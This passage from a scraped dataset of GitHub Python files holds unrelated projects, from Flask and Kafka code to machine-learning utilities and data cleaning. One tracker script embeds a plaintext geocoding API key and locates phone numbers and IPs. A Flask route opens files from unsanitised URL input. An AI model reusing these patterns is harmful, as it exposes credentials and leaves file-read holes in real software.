rover=form.rover.data, pictureDate = form.pictureDate.data))\r\n else:\r\n flash(form.errors)\r\n return render_template('postcards_home.html', title='Home',form=form)\r\n\r\n@app.route('/postcards//')\r\ndef postcards(rover,pictureDate):\r\n file = open(f'cache/{rover}/{pictureDate}.json')\r\n data = json.load(file)\r\n file.close()\r\n return render_template('postcards.html', title=pictureDate, data=data)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True) \r\n","repo_name":"cosmonautinspace/Postcards-from-mars","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72953410041","text":"from model import Model\n\nclass Head_Pose_Estimation(Model):\n '''\n Class for the 
Head Pose Estimation Model.\n '''\n def __init__(self, model_name, device='CPU', extensions=None):\n super(Head_Pose_Estimation, self).__init__(model_name, device, extensions)\n\n self.input_name = next(iter(self.network.inputs))\n self.input_shape = self.network.inputs[self.input_name].shape\n self.input_width = self.input_shape[2]\n self.input_height = self.input_shape[3]\n self.output_name = next(iter(self.network.outputs))\n\n def predict(self, image):\n '''\n This method is meant for running predictions on the input image.\n '''\n input_image = self.preprocess_input(image)\n\n input_dict={self.input_name:input_image}\n outputs = self.exec_network.infer(input_dict)\n\n yaw, pitch, roll = self.preprocess_output(outputs)\n\n return yaw, pitch, roll\n\n def preprocess_input(self, image):\n processed_image = super().preprocess_input(image, self.input_height, self.input_width)\n return processed_image\n\n def preprocess_output(self, outputs):\n '''\n Before feeding the output of this model to the next model,\n preprocess the output.\n '''\n yaw = outputs['angle_y_fc'][0][0]\n pitch = outputs['angle_p_fc'][0][0]\n roll = outputs['angle_r_fc'][0][0]\n\n return yaw, pitch, roll\n","repo_name":"yamatokataoka/computer-pointer-controller","sub_path":"src/head_pose_estimation.py","file_name":"head_pose_estimation.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5138360848","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef load_data(path_X,path_y,test_size=0.5,standardize_X=False, standardize_y=False):\n X_test_adaptive = pd.read_csv(path_X, index_col = 'Unnamed: 0')\n y_test = pd.read_csv(path_y, index_col = 'Unnamed: 0')\n\n if path_X==\"traffic_predictions_test_val.csv\":\n X_test_adaptive = X_test_adaptive.drop(columns = ['DummyRegressor', 'Lasso', 'LassoLars'])\n elif path_X==\"data/X_test_adaptive.csv\":\n X_test_adaptive = X_test_adaptive.drop(\n columns=['RANSACRegressor', 'GaussianProcessRegressor', 'KernelRidge', 'Lars', 'AdaBoostRegressor',\n 'DummyRegressor', 'ExtraTreeRegressor', 'Lasso', 'LassoLars', 'PassiveAggressiveRegressor'])\n\n X_t, X_te, y_t, y_te = train_test_split(X_test_adaptive, y_test, test_size = test_size, shuffle = False, random_state = 6)\n\n if standardize_X:\n scaler_X = StandardScaler()\n scaler_X.fit(X_t)\n X_t = scaler_X.transform(X_t)\n X_te = scaler_X.transform(X_te)\n\n scaler_y = StandardScaler()\n if standardize_y:\n scaler_y.fit(y_t)\n y_t = scaler_y.transform(y_t)\n y_te = scaler_y.transform(y_te)\n\n return np.array(X_t), np.array(X_te), np.array(y_t).reshape(-1), np.array(y_te).reshape(-1), scaler_y\n\n\ndef get_X_Z_y(X, y, T):\n '''\n Input: training data X and corresponding labels y ; how many time-steps from the past to be used\n Output: the past features X with past targets y as a Z training data (no present features)\n '''\n n, p = X.shape\n #T past time steps * p features + T targets + intercept term\n Z = np.ones((n-T, T*p+T+1))\n for i in range(T, n):\n for t in range(T):\n Z[i-T,p*t:p*(t+1)] = X[i-t-1]\n Z[i-T, p*T:-1] = y[i-T:i]\n return X[T:], Z, y[T:]\n\ndef get_X_Z_y_standard_regression(X, y, T):\n '''\n Input: training data X and corresponding labels y ; how many time-steps from the past to be used\n Output: the past features X with past targets y as a Z training data + present features\n '''\n n, p = X.shape\n # T past time 
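# A quick shape sanity check for the get_X_Z_y() construction above: with n samples,
# p features and T lags, each row of Z stacks T past feature vectors, the T past
# targets and an intercept column, so Z.shape == (n - T, T*p + T + 1). The toy sizes
# below are illustrative assumptions.
import numpy as np

n, p, T = 8, 3, 2
X = np.arange(n * p, dtype=float).reshape(n, p)
y = np.arange(n, dtype=float)

Z = np.ones((n - T, T * p + T + 1))           # last column stays 1 (intercept)
for i in range(T, n):
    for t in range(T):
        Z[i - T, p * t:p * (t + 1)] = X[i - t - 1]   # lagged features
    Z[i - T, p * T:-1] = y[i - T:i]                  # lagged targets

assert Z.shape == (n - T, T * p + T + 1)      # (6, 9) for these sizes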
steps * p features + p present features + T targets + intercept term\n Z = np.ones((n-T, (T+1)*p+T+1))\n for i in range(T, n):\n for t in range(T+1):\n Z[i-T,p*t:p*(t+1)] = X[i-t]\n Z[i-T, p*(T+1):-1] = y[i-T:i]\n return X[T:], Z, y[T:]","repo_name":"leobix/adaptive_ensemble","sub_path":"python_code/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"27908350116","text":"import requests\nimport time\n\n\ndef download_site(url, session):\n with session.get(url) as response:\n print(f\"Read {len(response.content)} from {url}\")\n\n\ndef download_all_sites(sites):\n with requests.Session() as session:\n for url in sites:\n download_site(url, session)\n\n\nif __name__ == \"__main__\":\n sites = [\n \"https://www.dinamalar.com\",\n \"https://thehindu.com\",\n ] * 80\n start_time = time.time()\n download_all_sites(sites)\n duration = time.time() - start_time\n print(f\"Downloaded {len(sites)} in {duration} seconds\")","repo_name":"sanjaypradeep/Python-Data-Structure","sub_path":"MultiTasking/Synchronous.py","file_name":"Synchronous.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"40"} +{"seq_id":"38576483856","text":"import json\nimport pycountry\nfrom tkinter import Tk, Label, Button, Entry\nimport requests\n\n\nfrom phone_iso3166.country import phone_country\n\ndef number_details1():\n import phonenumbers\n import folium\n from mynumber import number\n from phonenumbers import geocoder,timezone,carrier\n \n\n key ='b72366878ec4414381ce6defa1dec069'\n samnumber = phonenumbers.parse(number)\n print(samnumber)\n yourlocation = geocoder.description_for_number(samnumber,\"en\")\n print(\"Country Name : \",yourlocation)\n\n time= timezone.time_zones_for_number(samnumber)\n print(\"Zone :\", time)\n\n #get service provider\n\n service_provider = phonenumbers.parse(number)\n print(\"Operator : \",carrier.name_for_number(service_provider,\"en\"))\n\n from opencage.geocoder import OpenCageGeocode\n geocoder = OpenCageGeocode(key)\n\n query=str(yourlocation)\n result=geocoder.geocode(query)\n #print(result)\n\n lat=result[0]['geometry']['lat']\n lng=result[0]['geometry']['lng']\n print(lat,lng)\n\n mymap= folium.Map(location=[lat,lng],zoom_start=9)\n\n folium.Marker([lat,lng],popup=yourlocation).add_to((mymap))\n\n ##save map on html file\n mymap.save(\"mylocation.html\")\n\ndef number_details2():\n \n #track secound\n class Location_Tracker:\n def __init__(self, App):\n self.window = App\n self.window.title(\"Phone number Tracker\")\n self.window.geometry(\"500x400\")\n self.window.configure(bg=\"#3f5efb\")\n self.window.resizable(False, False)\n \n #___________Application menu_____________\n Label(App, text=\"Enter a phone number\",fg=\"white\", font=(\"Times\", 20), bg=\"#3f5efb\").place(x=150,y= 30)\n self.phone_number = Entry(App, width=16, font=(\"Arial\", 15), relief=\"flat\")\n self.track_button = Button(App, text=\"Track Country\", bg=\"#22c1c3\", relief=\"sunken\")\n self.country_label = Label(App,fg=\"white\", font=(\"Times\", 20), bg=\"#3f5efb\")\n \n #___________Place widgets on the window______\n self.phone_number.place(x=170, y=120)\n self.track_button.place(x=200, y=200)\n self.country_label.place(x=100, y=280)\n \n #__________Linking button with countries ________\n self.track_button.bind(\"\", self.Track_location)\n #255757294146\n \n def 
Track_location(self,event):\n phone_number = self.phone_number.get()\n country = \"Country is Unknown\"\n if phone_number:\n tracked = pycountry.countries.get(alpha_2=phone_country(phone_number))\n print(tracked)\n if tracked:\n if hasattr(tracked, \"official_name\"):\n country = tracked.official_name\n else:\n country = tracked.name\n self.country_label.configure(text=country)\n \n \n \n PhoneTracker = Tk()\n MyApp = Location_Tracker(PhoneTracker)\n PhoneTracker.mainloop()\n\ndef ip_info():\n \n\n ## single ip request\n response = requests.get(\"http://ip-api.com/json/24.48.0.1\").json()\n #\n print(response['lat'])\n print(response['lon'])\n\n # batch ip request\n\n response = requests.post(\"http://ip-api.com/batch\", json=[\n {\"query\": \"103.120.203.180\"},\n ]).json()\n\n for ip_info in response:\n for k,v in ip_info.items():\n print(k,v)\n print(\"\\n\")\n\n\nwhile(1):\n print(\"1. Number Details \\n2. Number Details from user \\n3. IP Location track\\n\")\n a = int(input(\"Chose One : \"))\n if a==1:\n number_details1()\n elif a==2:\n number_details2()\n elif a==3:\n ip_info()\n ","repo_name":"SAZZAD-AMT/NUMBER-TRACE-USING-PYTHON","sub_path":"locationtrace.py","file_name":"locationtrace.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"4899661077","text":"import logging\nimport shutil\nimport subprocess\nimport uuid\nimport json\nimport datetime\nimport pkg_resources\n\nfrom murakami.errors import RunnerError\nfrom murakami.runner import MurakamiRunner\n\nlogger = logging.getLogger(__name__)\n\n\nclass Ndt7ClientCustom(MurakamiRunner):\n \"\"\"Run ndt7 test.\"\"\"\n def __init__(self, config=None, data_cb=None,\n location=None, network_type=None, connection_type=None,\n device_id=None):\n super().__init__(\n title=\"ndt7custom\",\n description=\"The Network Diagnostic Tool v7 test.\",\n config=config,\n data_cb=data_cb,\n location=location,\n network_type=network_type,\n connection_type=connection_type,\n device_id=device_id\n )\n\n self._server_selection = {}\n\n # Load all the available server selection algorithms.\n for entry_point in pkg_resources.iter_entry_points(\n \"murakami.selection\"\n ):\n self._server_selection[entry_point.name] = entry_point.load()()\n\n def _run_client(self, args):\n starttime = datetime.datetime.utcnow()\n output = subprocess.run(\n args,\n text=True,\n capture_output=True,\n )\n endtime = datetime.datetime.utcnow()\n\n murakami_output = {\n 'TestName': \"ndt7\",\n 'TestStartTime': starttime.strftime('%Y-%m-%dT%H:%M:%S.%f'),\n 'TestEndTime': endtime.strftime('%Y-%m-%dT%H:%M:%S.%f'),\n 'MurakamiLocation': self._location,\n 'MurakamiConnectionType': self._connection_type,\n 'MurakamiNetworkType': self._network_type,\n 'MurakamiDeviceID': self._device_id,\n }\n\n if output.returncode == 0:\n # Parse ndt7 summary.\n summary = {}\n try:\n summary = json.loads(output.stdout)\n except json.JSONDecodeError:\n raise RunnerError(\n 'ndt7-client',\n 'ndt7-client did not return a valid JSON summary.'\n )\n logger.info(\"ndt7 test completed successfully.\")\n\n # Parse ndt7-client-go's summary JSON and generate Murakami's\n # output format.\n download = summary.get('Download')\n upload = summary.get('Upload')\n\n murakami_output['ServerName'] = summary.get('ServerFQDN')\n murakami_output['ServerIP'] = summary.get('ServerIP')\n murakami_output['ClientIP'] = summary.get('ClientIP')\n murakami_output['DownloadUUID'] = download.get('UUID')\n if download is not 
None:\n throughput = download.get(\"Throughput\")\n if throughput is not None:\n murakami_output['DownloadValue'] = throughput.get('Value')\n murakami_output['DownloadUnit'] = throughput.get('Unit')\n murakami_output['DownloadError'] = None\n retransmission = download.get(\"Retransmission\")\n if retransmission is not None:\n murakami_output['DownloadRetransValue'] = retransmission.get('Value')\n murakami_output['DownloadRetransUnit'] = retransmission.get('Unit')\n latency = download.get(\"Latency\")\n if latency is not None:\n murakami_output['MinRTTValue'] = latency.get('Value')\n murakami_output['MinRTTUnit'] = latency.get('Unit')\n if upload is not None:\n throughput = download.get(\"Throughput\")\n if throughput is not None:\n murakami_output['UploadValue'] = throughput.get('Value')\n murakami_output['UploadUnit'] = throughput.get('Unit')\n murakami_output['UploadError'] = None\n else:\n logger.warn(\"ndt7 test completed with errors.\")\n\n # Parse error line(s) and generate summary with UploadError and\n # DownloadError only, if available.\n errors = output.stdout.splitlines()\n for j in errors:\n try:\n message = json.loads(j)\n if message['Value']['Test'] == 'upload':\n murakami_output['UploadError'] = (\n message['Value']['Failure']\n )\n elif message['Value']['Test'] == 'download':\n murakami_output['DownloadError']= (\n message['Value']['Failure']\n )\n except Exception as exc:\n logger.error(\"Cannot parse error message: %s\", exc)\n\n # All the other fields are set to None (which will become null\n # in the JSON.)\n murakami_output['ServerName'] = None\n murakami_output['ServerIP'] = None\n murakami_output['ClientIP'] = None\n murakami_output['DownloadUUID'] = None\n murakami_output['DownloadValue'] = None\n murakami_output['DownloadUnit'] = None\n murakami_output['UploadValue'] = None\n murakami_output['UploadUnit'] = None\n murakami_output['DownloadRetransValue'] = None\n murakami_output['DownloadRetransUnit'] = None\n murakami_output['RTTValue'] = None\n murakami_output['RTTUnit'] = None\n \n return json.dumps(murakami_output)\n\n def _start_test(self):\n logger.info(\"Starting ndt7 test...\")\n\n # Check that a configuration file has been specified\n if \"config\" not in self._config:\n raise RunnerError(\n 'ndt7custom',\n 'No configuration file specified for the custom runner, \\\n skipping.')\n \n # Check that the ndt7-client executable is available.\n if shutil.which('ndt7-client') is None:\n raise RunnerError(\n 'ndt7custom',\n \"Executable ndt7-client does not exist, please install ndt7-client-go.\",\n )\n\n custom_config = {}\n try:\n with open(self._config['config']) as config_file:\n custom_config = json.load(config_file)\n except IOError as err:\n raise RunnerError(\n 'ndt7custom',\n 'Cannot open the custom configuration file: ' + str(err))\n \n # Get all the servers to run measurements against from the config,\n # applying the corresponding selection algorithm.\n servers = set()\n for group in custom_config.get('serverGroups', []):\n # the default selection algorithm is 'random'\n selection = group.get('selection', 'random')\n if selection not in self._server_selection:\n raise RunnerError(\n 'ndt7custom',\n 'Invalid server selection algorithm specified:' +\n selection)\n\n servers = servers | self._server_selection[selection].get_servers(\n group.get('servers', []))\n\n # Run a measurement against each of the selected servers.\n results = []\n for server in servers:\n cmdargs = [\n \"ndt7-client\",\n \"-format=json\",\n \"-quiet\",\n \"-scheme=ws\",\n 
\"-server=\" + server\n ]\n \n insecure = self._config.get('insecure', True)\n if insecure:\n cmdargs.append('-no-verify')\n \n logger.info(\"Running ndt7custom measurement (server): \" + server)\n results.append(self._run_client(cmdargs))\n \n # Check for additional countries/regions specified and run the client\n # using the locate service for each of them.\n countries = custom_config.get('countries', [])\n for country in countries:\n cmdargs = [\n \"ndt7-client\",\n \"-format=json\",\n \"-quiet\",\n \"-scheme=ws\",\n \"-locate.url=https://locate.measurementlab.net/v2/nearest/?country=\" + country\n ]\n logger.info(\"Running ndt7custom measurement (country): \" + country)\n results.append(self._run_client(cmdargs))\n \n regions = custom_config.get('regions', [])\n for region in regions:\n cmdargs = [\n \"ndt7-client\",\n \"-format=json\",\n \"-quiet\",\n \"-scheme=ws\",\n \"-locate.url=https://locate.measurementlab.net/v2/nearest/?region=\" + region\n ]\n logger.info(\"Running ndt7custom measurement (region): \" + region)\n results.append(self._run_client(cmdargs))\n\n return results\n \n","repo_name":"m-lab/murakami","sub_path":"murakami/runners/ndt7custom.py","file_name":"ndt7custom.py","file_ext":"py","file_size_in_byte":8793,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"40"} +{"seq_id":"26538534796","text":"import sys\nimport psycopg2\nimport psycopg2.extras\nfrom pgcopy import CopyManager\nfrom confluent_kafka import Consumer \nimport logging\nfrom collections import defaultdict\nimport json\nimport msgpack\nfrom datetime import datetime\nfrom iso3166 import countries\n\n\nclass saverPostgresql(object):\n \"\"\"Dumps hegemony results to a Postgresql database. \"\"\"\n\n def __init__(self, af, host=\"localhost\", dbname=\"ihr\"):\n\n self.prevts = 0 \n self.af = int(af)\n self.dataHege = [] \n self.cpmgr = None\n self.continents = {\n 'EU': 'European Union',\n 'AP': 'Asia-Pacific'\n }\n\n conn_string = \"host='127.0.0.1' dbname='%s'\" % dbname\n\n self.conn = psycopg2.connect(conn_string)\n columns=(\"timebin\", \"country_id\", \"asn_id\", \"hege\", \"af\", \"weight\", \"weightscheme\", \"transitonly\")\n self.cpmgr = CopyManager(self.conn, 'ihr_hegemony_country', columns)\n self.cursor = self.conn.cursor()\n logging.debug(\"Connected to the PostgreSQL server\")\n\n self.consumer = Consumer({\n 'bootstrap.servers': 'kafka1:9092, kafka2:9092, kafka3:9092',\n 'group.id': 'ihr_hegemony_countries_psql_sink_ipv{}'.format(self.af),\n 'auto.offset.reset': 'earliest',\n })\n\n self.consumer.subscribe(['ihr_hegemony_countries_ipv{}'.format(self.af)])\n\n self.updateCountries()\n\n def run(self):\n \"\"\"\n Consume data from the kafka topic and save it to the database.\n \"\"\"\n\n while True:\n msg = self.consumer.poll(10.0)\n if msg is None:\n self.commit()\n continue\n\n if msg.error():\n logging.error(\"Consumer error: {}\".format(msg.error()))\n continue\n\n msg_val = msgpack.unpackb(msg.value(), raw=False)\n\n self.save(msg_val)\n\n def updateCountries(self):\n '''\n Get the list of countries from the database\n '''\n\n self.cursor.execute(\"SELECT code FROM ihr_country\")\n self.countries = set([x[0] for x in self.cursor.fetchall()])\n logging.debug(\"%s counties registered in the database\" % len(self.countries))\n\n\n def save(self, msg):\n \"\"\"\n Buffer the given message and make sure corresponding ASNs are \n registered in the database.\n \"\"\"\n\n if 'ts' not in msg:\n print(msg)\n # Update the current bin timestamp\n if 
self.prevts != msg['ts']:\n self.commit()\n self.prevts = msg['ts']\n self.currenttime = datetime.utcfromtimestamp(msg['ts'])\n logging.debug(\"start recording country hegemony\")\n\n\n # Update seen countries\n if msg['cc'] not in self.countries:\n self.countries.add(msg['cc'])\n if msg['cc'] in self.continents:\n country_name = self.continents[msg['cc']]\n else:\n country_name = countries.get(msg['cc']).name\n\n logging.warning(\"psql: add new country %s: %s\" % (msg['cc'], country_name))\n self.cursor.execute(\n \"INSERT INTO ihr_country(code, name, tartiflette, disco ) \\\n select %s, %s, FALSE, FALSE \\\n WHERE NOT EXISTS ( SELECT code FROM ihr_country WHERE code = %s)\", \n (msg['cc'], country_name, msg['cc']))\n\n # Hegemony values to copy in the database\n if msg['hege']!= 0:\n self.dataHege.append((self.currenttime, msg['cc'], int(msg['asn']), \n float(msg['hege']), self.af, msg['original_weight'], msg['weight'].lower(), msg['transit_only']))\n\n\n def commit(self):\n \"\"\"\n Push buffered messages to the database and flush the buffer.\n \"\"\"\n\n if len(self.dataHege) == 0:\n return\n\n logging.warning(\"psql: start copy\")\n self.cpmgr.copy(self.dataHege)\n self.conn.commit()\n logging.warning(\"psql: end copy\")\n\n self.dataHege = []\n self.updateCountries()\n\n\nif __name__ == \"__main__\":\n if len(sys.argv)<2:\n print(\"usage: %s af\" % sys.argv[0])\n sys.exit()\n\n FORMAT = '%(asctime)s %(processName)s %(message)s'\n logging.basicConfig(format=FORMAT, filename='ihr-kafka-psql-HegemonyCountry.log', level=logging.WARN, datefmt='%Y-%m-%d %H:%M:%S')\n logging.warning(\"Started: %s\" % sys.argv)\n\n af = int(sys.argv[1])\n ss = saverPostgresql(af)\n ss.run()\n\n","repo_name":"InternetHealthReport/kafka-toolbox","sub_path":"psql/consumers/CountryHegemony.py","file_name":"CountryHegemony.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"27849492996","text":"def solution(X, Y):\n result = ''\n for i in range(9,-1,-1):\n result += str(i)*min(X.count(str(i)), Y.count(str(i)))\n if result == '':\n return \"-1\"\n elif len(result) == result.count(\"0\"):\n return \"0\"\n else:\n return result","repo_name":"miracle-21/algorithm","sub_path":"프로그래머스/lv1/131128. 숫자 짝꿍/숫자 짝꿍.py","file_name":"숫자 짝꿍.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71468862201","text":"from typing import Callable\nimport tensorflow as tf\nimport numpy as np\n\nfrom aegomoku.policies.radial import radial_3xnxn, radial_2xnxn\n\n\nclass MaxInfluencePolicyParams:\n def __init__(self, board_size, radial_constr, radial_obstr, sigma, iota):\n self.board_size = board_size\n self.radial_constr = radial_constr\n self.radial_obstr = radial_obstr\n self.sigma = sigma\n self.iota = iota\n\n\nclass NaiveInfluenceLayer(tf.keras.layers.Layer, Callable):\n\n def __init__(self, board_size):\n\n super().__init__()\n params = MaxInfluencePolicyParams(\n board_size=board_size,\n sigma=.7,\n iota=3,\n radial_constr=[.0625, .125, .25, .5],\n radial_obstr=[-.0625, -.125, -.25, -.5]\n )\n self.params = params\n self.input_size = board_size + 2\n self.kernel_size = 2 * len(self.params.radial_constr) + 1\n self.filters = None\n self.biases = None\n self.occupied_suppression = -100.\n\n self.potential = self.create_layers()\n\n\n def call(self, sample):\n # add two more channels filled with zeros. 
They'll be carrying the 'influence' of the surrounding stones.\n # That allows for arbitrarily deep chaining within our architecture\n n = self.input_size\n extended = np.concatenate([sample, np.zeros((1, n, n, 2))], axis=3) # .reshape((-1, n, n, 5))\n\n y = self.potential(extended)\n y = self.potential(y)\n y = self.potential(y)\n return y\n\n\n def create_layers(self):\n self.construct_filters()\n\n # Compute the current player's total potential, can be arbitrarily repeated\n # to create some forward-looking capabilities\n potential = tf.keras.layers.Conv2D(\n filters=5, kernel_size=self.kernel_size,\n kernel_initializer=tf.constant_initializer(self.filters),\n bias_initializer=tf.constant_initializer(self.biases),\n activation=tf.nn.relu,\n padding='same',\n input_shape=(self.input_size, self.input_size, 5))\n\n return potential\n\n\n def construct_filters(self):\n \"\"\"\n Five filters with five channels each. Like a 5x5 dense over each position.\n Two filters compute the influence, the others just project the input forward.\n This is designed so to give each layer the information about where exactly the stones are.\n I believe that's ok for a early-disposed heuristic auxiliary\n :return:\n \"\"\"\n len_radial = len(self.params.radial_constr)\n\n # Determine the current player's offensive potential\n inf_stones_curr = radial_3xnxn(self.params.radial_constr, self.params.radial_obstr, self.params.radial_obstr,\n self.occupied_suppression, self.occupied_suppression, self.occupied_suppression,\n gamma=1.0)\n inf_inf_curr = radial_2xnxn(self.params.radial_constr, self.params.radial_obstr,\n .9, .9, # discounting for 2nd order influence\n gamma=.9) # discounting for the time lag of the opponent - it's me first\n inf_curr = np.concatenate([inf_stones_curr, inf_inf_curr], axis=2)\n\n #\n # Determine the other player's offensive potential (to determine the need of defense)\n inf_stones_oth = radial_3xnxn(self.params.radial_obstr, self.params.radial_constr, self.params.radial_obstr,\n self.occupied_suppression, self.occupied_suppression, self.occupied_suppression,\n gamma=1.0)\n inf_inf_oth = radial_2xnxn(self.params.radial_obstr, self.params.radial_constr,\n .9, .9, # discounting for 2nd order influence\n gamma=.9) # discounting for the time lag of my next move - it's him/her first\n inf_oth = np.concatenate([inf_stones_oth, inf_inf_oth], axis=2)\n\n #\n # Projectors simply pass the stone channels through to the next layer\n zero = radial_2xnxn([0] * len_radial, None, 0, 0)\n\n proj_cur = radial_3xnxn([0] * len_radial, None, None, 1, 0, 0)\n proj_cur = np.concatenate([proj_cur, zero], axis=2)\n\n proj_oth = radial_3xnxn([0] * 4, None, None, 0, 1, 0)\n proj_oth = np.concatenate([proj_oth, zero], axis=2)\n\n proj_bnd = radial_3xnxn([0] * 4, None, None, 0, 0, 1)\n proj_bnd = np.concatenate([proj_bnd, zero], axis=2)\n\n filters = [proj_cur, proj_oth, proj_bnd, inf_curr, inf_oth]\n self.biases = [0.] 
* len(filters)\n filters = np.stack(filters, axis=3)\n self.filters = np.reshape(filters, (self.kernel_size, self.kernel_size, 5, 5))\n","repo_name":"Project-Ellie/DeepGomoku","sub_path":"aegomoku/policies/naive_infuence.py","file_name":"naive_infuence.py","file_ext":"py","file_size_in_byte":4815,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"26959393521","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nimport pandas as pd\nimport re\n\n\n# In[7]:\n\n\nfile = 'topartistsoverall2016.csv'\n\n\n# In[11]:\n\n\nimport csv\ndef get_data(file):\n file = file\n artists = []\n with open(file) as fh:\n rd = csv.DictReader(fh, delimiter = ',')\n for row in rd:\n artists.append(row)\n return artists\n\n\n# In[15]:\n\n\nx = get_data(file)\nx[:2]\n\n\n# In[14]:\n\n\ntitles2015 = ['Rank', 'Artist', 'Turnover', 'Sold lots', 'Top Auction Result']\n\n\n# In[43]:\n\n\ndef clean_data(read_file, year):\n return_list = []\n for artist in read_file:\n new_item = {}\n new_item['Rank'] = int(artist['A'])\n name_date = artist['B'].title().split('(')\n new_item['Name'] = name_date[0].split()\n years = name_date[-1].strip('()').split('-')\n new_item['Life'] = years\n new_item['TotalSold'] = int(re.sub(\"[^0-9]\", \"\", artist['C']))\n new_item['TotalLots'] = int(re.sub(\"[^0-9]\", \"\", artist['D']))\n new_item['MaxPrice'] = int(re.sub(\"[^0-9]\", \"\", artist['E']))\n new_item['SaleYear'] = year\n return_list.append(new_item)\n return return_list\n\n\n# In[44]:\n\n\nclean2015top500 = clean_data(x, 2015)\n\n\nfile1 = '2014top500.csv'\ny = get_data(file1)\nclean2014top500 = clean_data(y, 2014)\n\n\nfile2 = '2009500.csv'\nz = get_data(file2)\n\n\ndef clean_data_extended(read_file, year):\n return_list = []\n for artist in read_file:\n new_item = {}\n new_item['Rank'] = int(artist['A'])\n name_date = artist['B'].title().split('(')\n new_item['Name'] = list(reversed(name_date[0].split()))\n years = name_date[-1].strip('()').split('-')\n new_item['Life'] = years\n new_item['TotalSold'] = int(re.sub(\"[^0-9]\", \"\", artist['C']))\n new_item['TotalLots'] = int(re.sub(\"[^0-9]\", \"\", artist['E']))\n new_item['MaxPrice'] = int(re.sub(\"[^0-9]\", \"\", artist['G']))\n new_item['SaleYear'] = year\n return_list.append(new_item)\n return return_list\n\n\n\nclean2009top500 = clean_data_extended(z, 2009)\n\n\ndef clean_extended(data):\n for artist in data:\n if artist['Name'][-1].isdigit():\n artist['Name'].pop()\n\n\nclean_extended(clean2009top500)\n\nfile3 = '2008500.csv'\nw = get_data(file3)\nclean2008top500 = clean_data_extended(w, 2008)\n\nclean_extended(clean2008top500)\n","repo_name":"vaeb80/Top-500-Art-Project","sub_path":"csv_clean_etc/artists2008091415.py","file_name":"artists2008091415.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74340664120","text":"import numpy as np\n\n\nfrom signal_processing.extensions import plt_extension\n\ndef visual_test_plot_with_labels():\n x = np.arange(10)\n y = np.arange(10)\n x_label = \"x\"\n curv_label = \"curv\"\n plt_extension.plot_with_labels(x, y, x_label, curv_label)\n\n\n\"\"\"\ndef visual_test_plot_quick():\n t = np.arange(10) * U_.sec\n vals = np.arange(10) * U_.volt\n sig = ContinuousData(vals, t)\n plot_quick(sig)\n\n#visual_test_plot_quick()\n\ndef visual_test_plot():\n t = np.arange(10) * U_.sec\n vals = np.arange(10) * U_.volt\n sig = ContinuousData(vals, t)\n plot(sig)\n\n# 
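# create_layers() above freezes hand-built filters into a Conv2D through constant
# initializers, which turns the convolution into a deterministic feature detector.
# A minimal sketch of the same trick with a single 3x3 one-channel kernel (the
# kernel values are illustrative assumptions).
import numpy as np
import tensorflow as tf

kernel = np.zeros((3, 3, 1, 1), dtype=np.float32)
kernel[1, :, 0, 0] = [0.5, 1.0, 0.5]            # a horizontal "influence" profile

conv = tf.keras.layers.Conv2D(
    filters=1, kernel_size=3, padding='same',
    kernel_initializer=tf.constant_initializer(kernel),
    bias_initializer=tf.constant_initializer([0.0]),
    trainable=False)                             # keep the handcrafted weights fixed

y = conv(tf.ones((1, 5, 5, 1)))                  # interior responses equal 2.0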
visual_test_plot_quick()\n\ndef visual_test_plot_under():\n t = np.arange(10) * U_.sec\n vals = np.arange(10) * U_.amp\n sig = ContinuousData(vals, t)\n sig_2 = sig\n sig_list = [sig, sig_2]\n plot_under(sig_list)\n\n\"\"\"\n","repo_name":"tromer/signal_processing","sub_path":"signal_processing/tests/test_extensions/test_plt_extension.py","file_name":"test_plt_extension.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"1526562469","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 16 20:02:33 2023\n\n@author: aixuexi\n\"\"\"\nimport re\nimport os\nimport sys\nimport math\nimport json\nimport time as time_lib\nimport pickle\nimport random\nimport multiprocessing\nimport pandas as pd\nimport numpy as np\nimport prettytable as pt\nimport seaborn as sns \nimport matplotlib.pyplot as plt \nimport matplotlib as mpl\nimport matplotlib.ticker as mtick\nfrom matplotlib.colors import Normalize\nfrom tqdm import tqdm\nfrom sklearn import decomposition\nfrom matplotlib import rcParams\nfrom adjustText import adjust_text \n\nfrom scipy.optimize import curve_fit\nfrom scipy.stats import norm\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import r2_score\nfrom sklearn.decomposition import PCA\nfrom scipy.sparse import coo_matrix, csr_matrix\n\nimport torch\nfrom transformers import BertConfig, BertModel, BertTokenizer, AutoTokenizer\n\nimport tslearn\nfrom tslearn.metrics import dtw, dtw_path\nfrom tslearn.clustering import TimeSeriesKMeans\nfrom tslearn.generators import random_walks\nfrom tslearn.preprocessing import TimeSeriesScalerMeanVariance, TimeSeriesResampler\n\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\nfrom statsmodels.datasets import grunfeld\nfrom 